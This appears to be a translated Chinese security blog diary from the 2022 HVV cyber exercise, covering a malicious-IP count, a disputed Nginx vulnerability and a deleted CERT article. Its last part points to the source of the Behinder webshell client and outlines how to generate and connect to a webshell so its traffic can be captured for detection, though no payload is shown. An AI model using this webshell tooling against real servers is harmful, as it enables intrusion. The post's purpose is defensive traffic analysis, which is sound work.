2022 HVV (护网) Diary: Day 8

Miscellany

Today's post is in three parts:

  • Malicious IP/domain intelligence
  • A roundup of vendor vulnerabilities
  • Fun news you might care about

Malicious IP/domain intelligence

2,837 malicious IPs in total

A roundup of vendor vulnerabilities

At the request of the relevant parties, the vulnerability content has been hidden. For more, follow our WeChat official account.

Fun news you might care about

Did you hear about the Inspur gossip (🍉) today?

Roughly: during HVV an enthusiastic netizen worked a 24-hour shift and then collapsed...

Reportedly the hospital's diagnosis was "respiratory alkalosis". Fortunately the person is fine!

If you pull an all-nighter during HVV, be sure to rest properly the next day. Health comes first!

Debunking the Nginx vulnerability? What does the CNVD database say? Did QiAnXin CERT delete its article?

See https://www.cnvd.org.cn/flaw/show/CNVD-2022-54473

It should be caused by the LDAP module being introduced.


QiAnXin CERT also published its own assessment, "Don't let rumors drive incident response".


But the article now seems to have been deleted. Was it because the cover image was too aggressive, or was there a mistake in the assessment?


We have saved a snapshot of the article for reference; we reserve our own opinion.

Update 2022-08-02

https://mp.weixin.qq.com/s/cViO_ovSnHsc0nRtEg20Tg

Our guess is that the article was deleted because the cover image was too aggressive.


Is the source for the latest Behinder (冰蝎) 4.0.1 available? How do you analyze its traffic characteristics?

For the source, see "冰蝎客户端源码-V4.0.1" (Behinder client source code, V4.0.1).

An enthusiastic netizen also asked how to analyze Behinder's traffic.

That is straightforward: generate the webshell, connect to it, and capture the session with Wireshark. It really isn't hard!

For example, here is the payload of the xor_base64 PHP webshell I generated:


Then we only need to detect that payload in the traffic. All it takes is the time to capture the relevant packets. Of course, you can also look at characteristics in the request headers and so on; I won't go into that here.
